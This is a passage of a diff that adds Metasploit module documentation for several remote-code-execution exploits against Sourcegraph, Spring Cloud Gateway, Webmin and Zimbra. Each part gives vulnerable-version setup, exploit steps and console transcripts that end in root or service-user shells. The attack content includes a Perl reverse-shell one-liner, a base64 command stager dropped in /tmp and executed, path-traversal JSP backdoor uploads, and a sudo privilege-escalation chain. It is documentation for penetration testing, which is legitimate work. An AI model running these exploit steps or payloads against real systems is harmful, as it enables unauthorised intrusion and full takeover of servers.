+      --publish 127.0.0.1:3370:3370 \
+      --rm \
+      --volume /tmp/sourcegraph/config:/etc/sourcegraph \
+      --volume /tmp/sourcegraph/data:/var/opt/sourcegraph \
+      sourcegraph/server:3.36.3
+    ```
+2. Once the service has started, navigate to the webinterface at http://localhost:7080
+3. When prompted, create an administrator's account
+4. At least one git repository must be added, complete the following steps to add one.
+    1. Navigate to `Repositories > Managed code hosts`
+    2. Select "Generic Git host"
+    3. When prompted, use the following example JSON code to clone Metasploit.
+
+        ```
+        {
+          "url": "https://github.com/",
+          "repos": [
+            "rapid7/metasploit-framework.git"
+          ]
+        }
+       ```
+
+## Options
+
+### EXISTING_REPO
+
+An existing, cloned repository. If this value is not set, a random one will be selected from the server.
+
+## Scenarios
+
+### Docker v3.36.3
+
+```
+msf6 > use exploit/linux/http/sourcegraph_gitserver_sshcmd
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > set RHOSTS 192.168.159.128
+RHOSTS => 192.168.159.128
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > set TARGET Unix\ Command 
+TARGET => Unix Command
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
+PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > set LHOST 192.168.250.134
+LHOST => 192.168.250.134
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > check
+[+] 192.168.159.128:3178 - The target is vulnerable. Successfully set core.sshCommand.
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > exploit
+
+[*] Started reverse TCP handler on 192.168.250.134:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Successfully set core.sshCommand.
+[*] Using automatically identified repository: github.com/zerosteiner/gh-sandbox
+[*] Executing Unix Command target
+[*] Sending stage (40168 bytes) to 172.17.0.2
+[*] Sending stage (40168 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 172.17.0.2:59116) at 2022-07-08 17:23:15 -0400
+[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 172.17.0.2:59124) at 2022-07-08 17:23:15 -0400
+
+meterpreter > 
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer        : caab8e904df4
+OS              : Linux 5.17.12-100.fc34.x86_64 #1 SMP PREEMPT Mon May 30 17:47:02 UTC 2022
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > 
+```
@@ -0,0 +1,80 @@
+## Vulnerable Application
+
+The vulnerability exploits [CVE-2022-22947](https://nvd.nist.gov/vuln/detail/CVE-2022-22947) an unauthenticated RCE
+vulnerability in Spring Cloud Gateway. According to [VMware](https://tanzu.vmware.com/security/cve-2022-22947)
+the versions affected are:
+
+- 3.1.0
+- 3.0.0 to 3.0.6
+- Older, unsupported versions are also affected
+
+A sample demo [project](https://github.com/wdahlenburg/spring-gateway-demo) is available,
+which can be used to run a vulnerable server by following the installation instructions below.
+    
+### Installation Instructions
+
+```bash
+    # To use the pre-compile vulnerable application
+    wget https://github.com/wdahlenburg/spring-gateway-demo/releases/download/v.0.0.1/spring-gateway-demo-0.0.1-SNAPSHOT.jar
+    sudo apt install default-jdk
+    java -jar spring-gateway-demo-0.0.1-SNAPSHOT.jar # This will host the app on port 9000
+
+
+    # If you want to compile for a version of spring cloud gateway on your own
+    git clone https://github.com/wdahlenburg/spring-gateway-demo.git
+
+    # In pom.xml, change the version in '<spring-cloud.version>2021.0.1-SNAPSHOT</spring-cloud.version>'. 
+    # To see which spring cloud version includes which version of spring cloud gateway, 
+    # look here : https://repo1.maven.org/maven2/org/springframework/cloud/spring-cloud-dependencies/
+
+    apt install maven
+    mvn package -DskipTests
+    java -jar target/spring-gateway-demo-0.0.1-SNAPSHOT.jar # This will host the app on port 9000
+```
+
+
+## Verification Steps
+
+- Run the vulnerable server
+- Start msfconsole
+- Do: `use exploit/linux/http/spring_cloud_gateway_rce`
+- Do: `set RHOSTS <server_ip>`
+- Do: `set LHOST <metasploit_machine_ip>`
+- Do: `set RPORT 9000`
+- Do: `run`
+- You should get a Meterpreter shell.
+
+## Options
+
+No particular option to be set
+
+## Scenarios
+
+### Spring Cloud gateway version 3.1.0 on Linux kali 5.18.0-kali5-amd64
+
+```
+msf6 > use exploit/linux/http/spring_cloud_gateway_rce
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/spring_cloud_gateway_rce) > set RHOSTS 192.168.19.140
+RHOSTS => 192.168.19.140
+msf6 exploit(linux/http/spring_cloud_gateway_rce) > set RPORT 9000
+RPORT => 9000
+msf6 exploit(linux/http/spring_cloud_gateway_rce) > set LHOST 192.168.1.7
+LHOST => 192.168.1.7
+msf6 exploit(linux/http/spring_cloud_gateway_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.7:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if server is vulnerable
+[*] Triggering code execution using routes
+[+] Route deleted
+[+] The target is vulnerable.
+[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
+[*] Triggering code execution using routes
+[*] Sending stage (40164 bytes) to 192.168.1.7
+[*] Meterpreter session 7 opened (192.168.1.7:4444 -> 192.168.1.7:53264) at 2022-10-11 17:44:53 -0400
+[+] Route deleted
+
+meterpreter >
+```
+
@@ -0,0 +1,68 @@
+## Vulnerable Application
+
+In Webmin v1.984, any authenticated low privilege user without access rights to the
+File Manager module could interact with file manager functionalities such as downloading files from remote URLs and changing
+file permissions (chmod). It is possible to achieve Remote Code Execution via a crafted .cgi file by chaining those
+functionalities in the file manager.
+
+### Setup, on Ubuntu 20.04
+
+```
+wget https://download.webmin.com/devel/deb/webmin_1.984_all.deb
+sudo dpkg -i  webmin_1.984_all.deb
+```
+
+Webmin should now be installed. The credentials for the web UI will be the same as the
+user that installed Webmin
+
+## Options
+### USERNAME
+A specific username to authenticate as
+### PASSWORD
+A specific password to authenticate with
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/linux/http/webmin_file_manager_rce`
+1. Set the `RHOST`, `USERNAME`, and `PASSWORD` options
+1. Run the module
+1. Receive a session as the `root` user.
+
+## Scenarios
+### Webmin 1.984, on Ubuntu 20.04
+
+```
+msf6 > exploit/linux/http/webmin_file_manager_rce
+[*] Using exploit/linux/http/webmin_file_manager_rce
+msf6 exploit(linux/http/webmin_file_manager_rce) > set password notpassword
+password => notpassword
+msf6 exploit(linux/http/webmin_file_manager_rce) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(linux/http/webmin_file_manager_rce) > set rhosts 172.16.199.132
+rhosts => 172.16.199.132
+msf6 exploit(linux/http/webmin_file_manager_rce) > set username msfuser
+username => msfuser
+msf6 exploit(linux/http/webmin_file_manager_rce) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Using URL: http://172.16.199.1:8080/tmBFT82mvsHD
+[*] Attempting to authenticate with Webmin
+[+] Authentication successful
+[*] Downloading remote url
+[*] Fetching payload from HTTP server
+[*] Request 'GET /tmBFT82mvsHD.cgi'
+[*] Sending payload ...
+[*] Finished downloading remote url
+[*] Modifying the permissions of the uploaded payload to 0755
+[+] Deleted /usr/share/webmin/tmBFT82mvsHD.cgi
+[*] Command shell session 9 opened (172.16.199.1:4444 -> 172.16.199.132:58058) at 2022-10-25 16:21:02 -0400
+[*] Server stopped.
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux ubuntu 5.15.0-52-generic #58~20.04.1-Ubuntu SMP Thu Oct 13 13:09:46 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
+```
@@ -0,0 +1,103 @@
+## Vulnerable Application
+
+This module exploits an arbitrary command injection in Webmin versions prior to
+1.997.
+
+Webmin uses the OS package manager (`apt`, `yum`, etc.) to perform package
+updates and installation. Due to a lack of input sanitization, it is possible to
+inject an arbitrary command that will be concatenated to the package manager call.
+
+This exploit requires authentication and the account must have access to the
+Software Package Updates module.
+
+## Installation
+
+### Ubuntu
+- Download a vulnerable version: http://prdownloads.sourceforge.net/webadmin/webmin_1.996_all.deb
+- Install it along with its dependencies (`libio-pty-perl` required when installing on Ubuntu 20.04)
+```
+apt-get install libauthen-pam-perl libio-pty-perl
+dpkg -i ./webmin_1.996_all.deb
+```
+
+## Setup
+- Go to `https://<target IP>:10000/`
+- Login as `root` with the OS password
+- Create a new user:
+  `Webmin > Webmin Users > Create a new privileged user > enter the username and password > click Create`
+- Setup permissions
+  `Click on the username > Available Webmin modules > select "Software Package Updates" in the System module list > Save`
+
+## Verification Steps
+1. Install and setup the application
+1. Start msfconsole
+1. Do: `use exploit/linux/http/webmin_package_updates_rce`
+1. Do: `run lhost=<local IP> rhosts=<target IP> username=<username> password=<user password>`
+1. You should get a shell.
+
+## Options
+
+### TARGETURI
+
+Set this to the Webmin base path. The default is `/`.
+
+### USERNAME
+
+The account username to use.
+
+### PASSWORD
+
+The account password.
+
+## Scenarios
+
+### Webmin 1.996 on Ubuntu 18.04
+- Target 0 (`Unix In-Memory`)
+```
+msf6 exploit(linux/http/webmin_package_updates_rce) > run lhost=192.168.0.2 verbose=true rhosts=192.168.0.23 username=msfuser password=123456
+
+[+] perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.0.2:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
+[*] Started reverse TCP handler on 192.168.0.2:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Webmin 1.996 detected
+[+] Webmin 1.996 is a supported target
+[+] The target appears to be vulnerable.
+[*] Attempting login
+[+] Logged in!
+[*] Sending payload
+[*] Command shell session 4 opened (192.168.0.2:4444 -> 192.168.0.23:51860) at 2022-08-03 11:26:01 +0200
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+
+cat /etc/issue
+Ubuntu 18.04.6 LTS \n \l
+```
+
+- Target 1 (`Linux Dropper`)
+```
+msf6 exploit(linux/http/webmin_package_updates_rce) > run lhost=192.168.0.2 verbose=true rhosts=192.168.0.23 username=msfuser password=123456
+
+[*] Started reverse TCP handler on 192.168.0.2:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Webmin 1.996 detected
+[+] Webmin 1.996 is a supported target
+[+] The target appears to be vulnerable.
+[*] Attempting login
+[+] Logged in!
+[*] Sending payload
+[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCokAFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/abOFM.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/IBkCa' < '/tmp/abOFM.b64' ; chmod +x '/tmp/IBkCa' ; '/tmp/IBkCa' ; rm -f '/tmp/IBkCa' ; rm -f '/tmp/abOFM.b64'"]
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3020772 bytes) to 192.168.0.23
+[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.23:51870) at 2022-08-03 11:26:51 +0200
+[*] Command Stager progress - 100.00% done (823/823 bytes)
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.0.23
+OS           : Ubuntu 18.04 (Linux 5.4.0-122-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
@@ -0,0 +1,190 @@
+## Vulnerable Application
+
+This module exploits a symlink-based path traversal vulnerability in `cpio`
+(that's identified as CVE-2015-1197) that's exploitable in Zimbra. The
+following versions of Zimbra are vulnerable:
+
+* Zimbra Collaboration Suite 9.0.0 Patch 26 (and earlier)
+* Zimbra Collaboration Suite 8.8.15 Patch 33 (and earlier)
+
+The patch for Zimbra adds `pax` as a pre-requisite, so any version of Zimbra
+(except Ubuntu 18.04, which has a patched `cpio` binary) can be made vulnerable
+with `rm $(which pax)`.
+
+To verify a host is vulnerable, ensure that `pax` is not installed on the host.
+Also, validate that `cpio` is listed in `amavisd.conf` as an option to extract
+.tar/.cpio files:
+
+```
+[ron@mail tmp]$ sudo cat /opt/zimbra/conf/amavisd.conf | grep cpio
+[...]
+
+  [['cpio','tar'], \&do_pax_cpio, ['pax', 'gcpio', 'cpio'] ],
+```
+
+Note that this can be chained with other Zimbra exploits to get root.
+
+### Installing Zimbra
+
+Create a VM
+
+```
+HDD = 128gb
+Memory/etc don't matter
+```
+
+I installed a local DNS server (note: replace `<ip>` with the host's actual ip)
+(other note: replace `apt` with `yum` to do this on a Red Hat-derived system):
+
+```
+sudo apt update && sudo apt install dnsmasq
+sudo hostnamectl set-hostname mail.example.org
+echo "<ip> mail.example.org" | sudo tee -a /etc/hosts
+echo -e 'listen-address=127.0.0.1\nserver=8.8.8.8\ndomain=example.org\nmx-host=example.org, mail.example.org, 5\nmx-host=mail.example.org, mail.example.org, 5' | sudo tee /etc/dnsmasq.conf
+```
+
+Configure the host to use it:
+
+```
+sudo systemctl disable systemd-resolved
+sudo systemctl stop systemd-resolved
+sudo killall dnsmasq
+sudo systemctl restart dnsmasq
+echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf
+```
+
+Download Zimbra from
+https://www.zimbra.com/downloads/zimbra-collaboration-open-source/ - you'll
+have to sell your soul and opt-in to spam, but they don't validate your email.
+
+```
+tar -xvvzf zcs-*.tgz
+cd zcs*
+sudo ./install.sh
+
+* Lots of <enter>
+* DO NOT install `dnscache` module (respond `N` when it ask), I had conflict issues with the local `dnsmasq`
+* Yes change the system
+* Setup the admin password, probably turn off auto-updates
+```
+
+
+## Verification Steps
+
+1. Do: `use exploit/linux/http/zimbra_cpio_cve_2022_41352`
+1. Do: `set RHOSTS <target>`
+1. Do: `set LHOST <listenerip>`
+1. Do: `exploit`
+
+
+## Options
+
+### `FILENAME`
+
+The filename to generate - defaults to `payload.tar`, but can be changed on the
+filesystem or whatever.
+
+### `TARGET_PATH`
+
+The absolute path where the payload will extract to. The default is the
+webroot, which is usually what you want
+
+### `TARGET_FILENAME`
+
+The actual filename. It really should end with `.jsp`, otherwise it won't
+execute.
+
+By default, it's a random string with `.jsp` on the end, in the `public/`
+folder. That should work fine, especially because we can't overwrite files and
+don't want to use the same payload name more than once.
+
+### `SYMLINK_FILENAME`
+
+The path used for the symlink inside the archive; you probably won't ever want
+to change this (default: random)
+
+### `TRIGGER_PAYLOAD`
+
+A boolean, default `true`, that determines whether we use HTTP requests to
+trigger the .jsp payload. Set to `false` to trigger the payload manually.
+
+### `ListenerTimeout`
+
+The number of seconds to wait for a new session (default = `0`, or infinite).
+
+### `CheckInterval`
+
+The frequency with which to check for the payload on the server. Every
+`CheckInterval`, it performs an HTTP request to the payload path.
+
+
+## Scenarios
+
+To exploit Zimbra, first load the module and generate the .tar file:
+
+```
+msf6 > use exploit/linux/http/zimbra_cpio_cve_2022_41352
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > set LHOST 172.16.166.147
+LHOST => 172.16.166.147
+msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > set RHOSTS 172.16.166.158
+RHOSTS => 172.16.166.158
+msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > exploit
+[*] Exploit running as background job 0.
+[*] Started reverse TCP handler on 172.16.166.147:4444
+[*] Encoding the payload as a .jsp file
+[*] Adding symlink to path to .tar file: /opt/zimbra/jetty_base/webapps/zimbra/
+[*] Adding target file to the archive: public/bdhg.jsp
+[+] payload.tar stored at /home/ron/.msf4/local/payload.tar
+[+] File created! Email the file above to any user on the target Zimbra server
+
+[...] waiting [...]
+```
+
+Then, email that file to any user (including a non-existent mailbox) on the
+Zimbra server. Once the payload arrives at Zimbra, Zimbra should try to extract
+it to check for malware with no user interaction. Metasploit should see the
+malicious file extracted and get a session:
+
+```
+[...]
+[+] File created! Email the file above to any user on the target Zimbra server
+[*] Trying to trigger the backdoor @ public/bdhg.jsp every 5s [backgrounding]...
+
+[file emailed]
+
+[*] Sending stage (3045348 bytes) to 172.16.166.158
+[*] Meterpreter session 1 opened (172.16.166.147:4444 -> 172.16.166.158:44808) at 2022-10-06 10:27:34 -0700
+
+msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: zimbra
+```
+
+For bonus points, use a different module to get root:
+
+```
+msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > use exploit/linux/local/zimbra_slapper_priv_esc
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+
+msf6 exploit(linux/local/zimbra_slapper_priv_esc) > set SESSION 1
+SESSION => 1
+
+msf6 exploit(linux/local/zimbra_slapper_priv_esc) > exploit
+
+[*] Started reverse TCP handler on 172.16.166.147:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Executing: sudo -n -l
+[+] The target appears to be vulnerable.
+[*] Creating exploit directory: /tmp/.vT1bDSvZV
+[*] Attempting to trigger payload: sudo /opt/zimbra/libexec/zmslapd -u root -g root -f /tmp/.vT1bDSvZV/.RhmWwHRn
+[*] Sending stage (3045348 bytes) to 172.16.166.158
+[+] Deleted /tmp/.vT1bDSvZV
+[*] Meterpreter session 2 opened (172.16.166.147:4444 -> 172.16.166.158:60166) at 2022-10-06 10:45:30 -0700
+
+meterpreter > getuid
+Server username: root
+```
+
@@ -0,0 +1,199 @@
+## Vulnerable Application
+
+This module exploits a path-traversal vulnerability as well as an authentication-bypass vulnerability
+in the following versions of Zimbra Collaboration Suite:
+
+* Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)
+* Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)
+
+Note that the open source edition is not affected.
+
+Successful exploitation results in RCE as the `zimbra` user.
+
+Installing the vulnerable versions of Zimbra is a pain, unfortunately. I used a trial version of ZCS 8.8.12,
+which you can currently get [here](https://www.zimbra.com/downloads/zimbra-collaboration/). On the download page,
+after you register with a valid email address, there's an "older versions" link where you can get vulnerable versions.
+
+To set the server up:
+1. `wget https://files.zimbra.com/downloads/8.8.12_GA/zcs-NETWORK-8.8.12_GA_3794.UBUNTU18_64.20190329045002.tgz` on a Ubuntu 18.04 VM.
+1. `tar -xvf zcs-NETWORK-8.8.12_GA_3794.UBUNTU18_64.20190329045002.tgz`
+1. `hostnamectl set-hostname <hostname of your choice>` to set the hostname for the VM.
+1. Edit the `/etc/hosts` file and add in a line `127.0.0.1 <hostname of your choice>`
+1. `cd zcs-NETWORK-8.8.12_GA_3794.UBUNTU18_64.20190329045002 && sudo ./setup.sh`
+1. Answer `Y` to every question.
+1. You will need to wait a while whilst some stuff is set up. You should then get to a menu.
+1. Use the number keys to select the menu options.
+1. Configure the rest of the options such as the admin password, and full path to license file.
+1. Once everything is configured you should get a prompt to press `a` to save and install. Press `a` when this appears.
+1. You will then be prompted to save the configuration. Accept this and respond `Y` to any further prompts.
+1. Server should start installing. Once its finished you should be ready to test.
+
+Once the server is up, it's vulnerable.
+
+```
+msf6 > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set RHOSTS 10.0.0.166
+RHOSTS => 10.0.0.166
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444
+[*] Encoding the payload as a .jsp file
+[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/wuuvqmtko.jsp
+[*] Sending POST request with ZIP file
+[*] Trying to trigger the backdoor @ public/wuuvqmtko.jsp
+[*] Sending stage (3020772 bytes) to 10.0.0.166
+[+] Successfully triggered the payload
+[+] Deleted ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/wuuvqmtko.jsp
+[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.166:35180) at 2022-08-19 11:06:38 -0700
+```
+
+There's no easy way that I see to check for the patch (and the only vulnerable version I have is
+quite a bit older), so attempts to exploit patched versions will likely result in a warning message
+that the target may not vulnerable:
+
+```
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444
+[*] Encoding the payload as a .jsp file
+[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/gauca.jsp
+[*] Sending POST request with ZIP file
+[*] Trying to trigger the backdoor @ public/gauca.jsp
+[-] Exploit aborted due to failure: unknown: Payload was not uploaded, the server probably isn't vulnerable
+[!] This exploit may require manual cleanup of '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/gauca.jsp' on the target
+[*] Exploit completed, but no session was created.
+```
+
+## Verification Steps
+1. `use exploit/linux/http/zimbra_mboximport_cve_2022_27925`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set LHOST <Address of Attacking Machine>`
+1. `exploit`
+1. You should get a shell as the `zimbra` user.
+
+## Options
+
+### `TARGET_PATH`
+
+The path (traversal included) where the payload will extract to. The default is the webroot, which is usually pretty safe.
+
+### `TARGET_FILENAME`
+
+The actual filename. It really should end with `.jsp`, otherwise it won't execute.
+
+By default, it's a random string with `.jsp` on the end. That should work fine, especially
+because we can't overwrite files and don't want to use the same payload name more than once.
+
+### `TARGET_USERNAME`
+
+The username included in the `mboximport` request - any valid username works, `admin` is usually fine.
+
+## Scenarios
+
+### Zimbra Collaboration Suite Network Edition 8.8.12 Patch 6 on Ubuntu 18.04
+
+```
+msf6 > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set RHOSTS 10.0.0.166
+RHOSTS => 10.0.0.166
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > show options
+
+Module options (exploit/linux/http/zimbra_mboximport_cve_2022_27925):
+
+   Name             Current Setting                                                                   Required  Description
+   ----             ---------------                                                                   --------  -----------
+   Proxies                                                                                            no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS           10.0.0.166                                                                        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT            7071                                                                              yes       The target port (TCP)
+   SSL              true                                                                              no        Negotiate SSL/TLS for outgoing connections
+   TARGET_FILENAME                                                                                    no        The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).
+   TARGET_PATH      ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/  yes       The location the payload should extract to (can, and should, contain path traversal characters - "../../").
+   TARGET_USERNAME  admin                                                                             yes       The target user, must be valid on the Zimbra server
+   VHOST                                                                                              no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.0.0.146       yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Zimbra Collaboration Suite
+
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444 
+[*] Encoding the payload as a .jsp file
+[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/nkxj.jsp
+[*] Sending POST request with ZIP file
+[*] Trying to trigger the backdoor @ public/nkxj.jsp
+[*] Sending stage (3020772 bytes) to 10.0.0.166
+[+] Successfully triggered the payload
+[+] Deleted ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/nkxj.jsp
+[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.166:48640) at 2022-08-22 11:08:19 -0700
+
+meterpreter > getuid
+Server username: zimbra
+
+meterpreter > shell
+Process 121849 created.
+Channel 1 created.
+/opt/zimbra/bin/zmcontrol -v
+Release 8.8.12.GA.3794.UBUNTU18.64 UBUNTU18_64 NETWORK edition, Patch 8.8.12_P6.
+```
+
+### Zimbra Collaboration Suite Network Edition 8.8.15 Patch 33 on Ubuntu 18.04
+
+Note: This version is not vulnerable, because the issue is patched
+
+```
+msf6 > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set RHOSTS 10.0.0.167
+RHOSTS => 10.0.0.167
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444
+[*] Encoding the payload as a .jsp file
+[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/gauca.jsp
+[*] Sending POST request with ZIP file
+[*] Trying to trigger the backdoor @ public/gauca.jsp
+[-] Exploit aborted due to failure: unknown: Payload was not uploaded, the server probably isn't vulnerable
+[!] This exploit may require manual cleanup of '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/gauca.jsp' on the target
+[*] Exploit completed, but no session was created.
+```
+
+### Zimbra Collaboration Suite Open Source Edition Patch 8.8.12 Patch 6 on Ubuntu 18.04
+
+Note: This version is not vulnerable, the open source edition doesn't have the correct path.
+
+```
+msf6 > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set RHOSTS 10.0.0.164
+RHOSTS => 10.0.0.164
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444 
+[*] Encoding the payload as a .jsp file
+[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/cualvccyq.jsp
+[*] Sending POST request with ZIP file
+[-] Exploit aborted due to failure: not-found: The target path was not found, target is probably not vulnerable
+[*] Exploit completed, but no session was created.
+```
@@ -0,0 +1,92 @@
+## Vulnerable Application
+
+This module exploits a symlink-based path traversal vulnerability in UnRAR 6.11 and earlier (open source version 6.1.6 and earlier) on Zimbra. You can get the vulnerable version of `unrar` here:
+
+* [Vulnerable unRAR version](https://www.rarlab.com/rar/rarlinux-x64-611.tar.gz)
+* [Github commit](https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946)
+
+Zimbra is the specific target, because certain Zimbra versions use `unrar` to scan incoming email. Specifically, the following versions of Zimbra, assuming the vulnerable version of `unrar` is installed, are affected:
+
+* Zimbra Collaboration 9.0.0 Patch 24 (and earlier)
+* Zimbra Collaboration 8.8.15 Patch 31 (and earlier)
+
+Installing the vulnerable versions of Zimbra is a pain, unfortunately. Currently, the following command works to downgrade Zimbra from the current version:
+
+```
+# apt-get install zimbra-patch=8.8.15.1651873147.p31.1-1.u18 zimbra-mta-patch=8.8.15.1651844231.p31.1-1.u18 zimbra-proxy-patch=8.8.15.1651844231.p31.1-1.u18
+# reboot
+```
+
+And to verify:
+
+```
+$ sudo -u zimbra /opt/zimbra/bin/zmcontrol -v
+Release 8.8.15.GA.3869.UBUNTU18.64 UBUNTU18_64 FOSS edition, Patch 8.8.15_P31.1.
+```
+
+Followed by specifically installing the vulnerable version of `unrar` linked above. Downpatching Zimbra like that is really finnicky, though, so that likely won't always work.
+
+## Verification Steps
+
+To exploit Zimbra, first load the module and generate the .rar file:
+
+```
+msf6 > use exploit/linux/http/zimbra_unrar_cve_2022_30333
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > set RHOSTS 10.0.0.154
+RHOSTS => 10.0.0.154
+msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444 
+[*] Encoding the payload as a .jsp file
